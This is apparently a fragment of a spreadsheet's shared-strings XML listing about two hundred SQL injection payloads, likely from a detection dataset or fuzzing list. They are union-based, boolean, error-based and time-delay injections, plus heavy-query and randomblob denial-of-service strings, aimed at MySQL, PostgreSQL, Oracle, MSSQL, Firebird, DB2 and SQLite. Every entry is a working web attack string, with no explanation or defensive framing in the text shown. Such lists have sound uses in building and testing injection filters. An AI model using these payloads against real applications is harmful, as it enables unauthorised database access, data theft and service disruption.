    <t>1  )  )   as dnwj where 2961 = 2961 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-7426' order by 1#</t>
  </si>
  <si>
    <t>1" )  as evoq where 8193 = 8193 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-9358' or 9887 = 2569--</t>
  </si>
  <si>
    <t>1" )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and  ( "hrkf" like "hrkf</t>
  </si>
  <si>
    <t>1  )  )   )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (   ( 1782 = 1782</t>
  </si>
  <si>
    <t>select  ( case when  ( 5009 = 1133 )  then 5009 else 5009* ( select 5009 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>1"  )  )   as vxkn where 2443 = 2443 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1' where 2134 = 2134 rlike  ( select  ( case when  ( 3613 = 2090 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>-7453'  )  )   )  or 8571 = 8571--</t>
  </si>
  <si>
    <t>1' )  as bscn where 6907 = 6907</t>
  </si>
  <si>
    <t>1 )  as hvsk where 7902 = 7902</t>
  </si>
  <si>
    <t>1" )  where 9461 = 9461 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-5124'+ ( select 'xpww' where 1752 = 1752 union all select 1752,1752,1752,1752,1752,1752,1752,1752,1752,1752--</t>
  </si>
  <si>
    <t>1'+ ( select 'unpz' where 8186 = 8186</t>
  </si>
  <si>
    <t>1 where 5081 = 5081 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1  )  )   or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1"  )  )   as itxo where 7916 = 7916</t>
  </si>
  <si>
    <t>-4108' )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )</t>
  </si>
  <si>
    <t>1  )  )   as rpwt where 4103 = 4103 and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1%' )  union all select null,null,null--</t>
  </si>
  <si>
    <t>1 )  as rtpl where 1262 = 1262 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) -- pvdw</t>
  </si>
  <si>
    <t>1%' )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1'  )  )   and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (  'opyp' = 'opyp</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 3116 = 9088#</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and  ( 'qfsu' = 'qfsu</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4250 = 4250 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) </t>
  </si>
  <si>
    <t>1  )  )   as ehlg where 6340 = 6340</t>
  </si>
  <si>
    <t>1%' and elt ( 4249 = 4249,7259 )  and '%' = '</t>
  </si>
  <si>
    <t>-4964"  )  )   union all select 4750,4750,4750,4750,4750--</t>
  </si>
  <si>
    <t>1  )  )   as zpvn where 2767 = 2767 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and   (  (   ( "mfro" like "mfro</t>
  </si>
  <si>
    <t>1'  )  )   )  union all select null,null,null#</t>
  </si>
  <si>
    <t>1" )  and elt ( 1889 = 7397,7397 )  and  ( "kuau" = "kuau</t>
  </si>
  <si>
    <t>1'|| ( select 'pvmz' from dual where 1090 = 1090 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1  )  )  ||'</t>
  </si>
  <si>
    <t>1%" )  union all select null,null,null,null--</t>
  </si>
  <si>
    <t>1' )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and  ( 'wdru' like 'wdru</t>
  </si>
  <si>
    <t>1"  )  )   and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and   (  (  "ykhp" like "ykhp</t>
  </si>
  <si>
    <t>1" and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and "rntg" like "rntg</t>
  </si>
  <si>
    <t>1 and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>-4927'  )  )   union all select 1924,1924#</t>
  </si>
  <si>
    <t>-7233" )  where 7574 = 7574 or 5821 = 3288</t>
  </si>
  <si>
    <t>1%' )  or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1'  )  )   and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>1 )  where 7425 = 7425 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1%" )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1  )  )   or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and   (  (  8554 = 8554</t>
  </si>
  <si>
    <t>1'+ ( select fhbk where 2570 = 2570 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )  )  +'</t>
  </si>
  <si>
    <t>-2610%" )  union all select 7779,7779,7779,7779,7779--</t>
  </si>
  <si>
    <t>-6599%"  )  )   or make_set ( 9354 = 9354,7185 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>-9657' )  as ziiq where 7725 = 7725 or 3038 = 3038</t>
  </si>
  <si>
    <t>1%"  )  )   and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t xml:space="preserve">1" and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) </t>
  </si>
  <si>
    <t>1'  )  )   and 2401 = 4693 and   (  (  'ssrm' = 'ssrm</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and "%" = "</t>
  </si>
  <si>
    <t>-7971' union all select 4273#</t>
  </si>
  <si>
    <t>1%" or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and "%" = "</t>
  </si>
  <si>
    <t>-2013"  )  )   as kisy where 3802 = 3802 or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>1 where 8393 = 8393</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )  </t>
  </si>
  <si>
    <t>1%" and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and "%" = "</t>
  </si>
  <si>
    <t>1'|| ( select 'jnsd' from dual where 2316 = 2316 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t xml:space="preserve">1' or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) </t>
  </si>
  <si>
    <t>1' )  as wnyl where 8978 = 8978 or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1"  )  )   as hdyn where 6027 = 6027 union all select null,null,null--</t>
  </si>
  <si>
    <t>1'  )  )   as rxhe where 3838 = 3838 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1' )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and  ( 'nopu' = 'nopu</t>
  </si>
  <si>
    <t>1%"  )  )   and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and   (  (  '%' = '</t>
  </si>
  <si>
    <t>-4166%" )  union all select 5190--</t>
  </si>
  <si>
    <t>1  )  )   )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and   (  (   ( 1601 = 1601</t>
  </si>
  <si>
    <t>1' )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and  ( 'dqoz' like 'dqoz</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1%' or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and '%' = '</t>
  </si>
  <si>
    <t>1'  )  )   )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and   (  (   ( 'dqjq' = 'dqjq</t>
  </si>
  <si>
    <t>1%" or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1" where 9889 = 9889</t>
  </si>
  <si>
    <t>1'+ ( select 'uqaf' where 7414 = 7414</t>
  </si>
  <si>
    <t>1  )  )   and 2006 = 2006</t>
  </si>
  <si>
    <t>1'+ ( select 'zkuf' where 3591 = 3591 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null  )  )  +'</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 8214 = 4954,1,1/0 ) </t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1'|| ( select 'brsr' where 5458 = 5458</t>
  </si>
  <si>
    <t>select  ( case when  ( 9299 = 2760 )  then 1 else 9299* ( select 9299 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>-1631%" )  or elt ( 8285 = 1709,1709 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1'+ ( select dpkp where 4836 = 4836 and sleep ( 5  )  )  +'</t>
  </si>
  <si>
    <t>-1305 )  or make_set ( 2298 = 5545,5545 )  and  ( 6715 = 6715</t>
  </si>
  <si>
    <t>-3861' )  as zmja where 4036 = 4036 or 9323 = 9323#</t>
  </si>
  <si>
    <t>1 )  or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1"  )  )   as nwnp where 6140 = 6140</t>
  </si>
  <si>
    <t>1" )  rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and  ( "rkvr" = "rkvr</t>
  </si>
  <si>
    <t>-9860 )  where 8743 = 8743 union all select 8743,8743,8743,8743,8743,8743,8743--</t>
  </si>
  <si>
    <t>1 )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and  ( 3814 = 3814</t>
  </si>
  <si>
    <t xml:space="preserve">1 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) </t>
  </si>
  <si>
    <t xml:space="preserve">1' and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) </t>
  </si>
  <si>
    <t>1%'  )  )   )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1" )  as tuem where 1328 = 1328</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) </t>
  </si>
  <si>
    <t>1'  )  )   )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and   (  (   ( 'wuux' = 'wuux</t>
  </si>
  <si>
    <t>-1597" where 5933 = 5933 or 3038 = 3038</t>
  </si>
  <si>
    <t>1" )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( "wmmg" like "wmmg</t>
  </si>
  <si>
    <t>1" where 8734 = 8734</t>
  </si>
  <si>
    <t xml:space="preserve">-2122" )  as zytb where 7025 = 7025 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) </t>
  </si>
  <si>
    <t xml:space="preserve"> end and   (  (  6874 = 6874</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( case when 8260 = 8260 then 1 else null end ) </t>
  </si>
  <si>
    <t>-7845' union all select 9574,9574,9574,9574,9574,9574#</t>
  </si>
  <si>
    <t>1" )  as hblk where 7982 = 7982 and 9611 = 6142--</t>
  </si>
  <si>
    <t>1%'  )  )   )  and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1" )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and  ( "cjkk" like "cjkk</t>
  </si>
  <si>
    <t>1%" rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>1%' waitfor delay '0:0:5' and '%' = '</t>
  </si>
  <si>
    <t>1'  )  )   and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  'rqbf' = 'rqbf</t>
  </si>
  <si>
    <t>-2726"  )  )   or elt ( 1032 = 1032,3623 )  and   (  (  "ococ" = "ococ</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and  ( 'cxjp' = 'cxjp</t>
  </si>
  <si>
    <t>-2246"  )  )   union all select 4613,4613,4613,4613,4613,4613#</t>
  </si>
  <si>
    <t>1' where 1557 = 1557</t>
  </si>
  <si>
    <t xml:space="preserve">1" ) </t>
  </si>
  <si>
    <t>1 )  where 6725 = 6725 and 1553 = 7419</t>
  </si>
  <si>
    <t>1%"  )  )   )  union all select null,null,null#</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1931 = 1931 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )  </t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and "%" = "</t>
  </si>
  <si>
    <t>1%' )  and elt ( 4670 = 9403,9403 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>-2424 )  where 8132 = 8132 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||ch</t>
  </si>
  <si>
    <t>1  )  )   )  and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (   ( 2341 = 2341</t>
  </si>
  <si>
    <t>1" where 1234 = 1234</t>
  </si>
  <si>
    <t>-3775' )  or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>1" )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and  ( "mejy" = "mejy</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and  ( 'pgth' = 'pgth</t>
  </si>
  <si>
    <t>-8640 )  or elt ( 7657 = 5020,5020 )  and  ( 2346 = 2346</t>
  </si>
  <si>
    <t>1 )  where 4710 = 4710 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) --</t>
  </si>
  <si>
    <t>1 )  where 8433 = 8433 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>1' and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1 where 7072 = 7072 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) --</t>
  </si>
  <si>
    <t>1%'  )  )   )  and make_set ( 1543 = 5817,5817 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>-9156'  )  )   union all select 9110,9110,9110,9110#</t>
  </si>
  <si>
    <t>1'  )  )   or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and   (  (  'xuwl' like 'xuwl</t>
  </si>
  <si>
    <t>1 )  and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1%' or sleep ( 5 )  and '%' = '</t>
  </si>
  <si>
    <t>1%' rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1'  )  )   as hrra where 9533 = 9533 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( "lzyl" like "lzyl</t>
  </si>
  <si>
    <t>-6611%"  )  )   )  union all select 8918,8918#</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and   (  (   ( 'ctbs' like 'ctbs</t>
  </si>
  <si>
    <t>1'  )  )   union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and  ( 'qomf' like 'qomf</t>
  </si>
  <si>
    <t>1" )  where 4822 = 4822 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'  )  )   as pqbq where 1865 = 1865</t>
  </si>
  <si>
    <t>-8409  )  )   as ipbz where 9984 = 9984 or 3371 = 3869</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1 where 6036 = 6036 and 7533 = 7533--</t>
  </si>
  <si>
    <t>1' )  where 6772 = 6772 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --</t>
  </si>
  <si>
    <t>-8504 where 3086 = 3086 or 1131 = 9188#</t>
  </si>
  <si>
    <t>-8238'  )  )   union all select 9797,9797,9797,9797,9797,9797,9797,9797#</t>
  </si>
  <si>
    <t>select  ( case when  ( 8711 = 6432 )  then 1 else 8711* ( select 8711 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>1' )  waitfor delay '0:0:5' and  ( 'vtfs' = 'vtfs</t>
  </si>
  <si>
    <t>select  ( case when  ( 5198 = 2518 )  then 5198 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>1" where 2309 = 2309 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1" )  where 2680 = 2680 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null  )  )  +'</t>
  </si>
  <si>
    <t>1'  )  )   and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  'hcpo' like 'hcpo</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and 'nlrk' like 'nlrk</t>
  </si>
  <si>
    <t>1'  )  )   and 3814 = 4272--</t>
  </si>
  <si>
    <t>-3737%" union all select 4452,4452,4452#</t>
  </si>
  <si>
    <t>select  ( case when  ( 1412 = 5313 )  then 1412 else 1412* ( select 1412 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>1'  )  )   as icik where 1440 = 1440 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1"  )  )   )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and   (  (   ( "djwo" = "djwo</t>
  </si>
  <si>
    <t>1' )  where 9951 = 9951  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   ) --</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1' )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and  ( 'zypa' = 'zypa</t>
  </si>
  <si>
    <t>1'  )  )   or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and   (  (  'ckmm' like 'ckmm</t>
  </si>
  <si>
    <t>1%"  )  )   or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1' )  where 5145 = 5145</t>
  </si>
  <si>
    <t>1'+ ( select tdkt where 4535 = 4535</t>
  </si>
  <si>
    <t>1" )  as klur where 7046 = 7046 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1  )  )   as yfvg where 1454 = 1454 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --</t>
  </si>
  <si>
    <t>1" )  as lkzz where 3565 = 3565 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1"  )  )   or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1 )  union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1" )  as qayu where 6222 = 6222 union all select null,null,null#</t>
  </si>
  <si>
    <t>1'|| ( select 'qwoo' from dual where 8802 = 8802 or elt ( 6272 = 6272,sleep ( 5  )  )   ) ||'</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and   (  (   ( "nvuv" like "nvuv</t>
  </si>
  <si>
    <t>1'  )  )   as wkys where 2478 = 2478 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>-9179" )  union all select 7144,7144,7144,7144,7144,7144,7144,7144--</t>
  </si>
  <si>
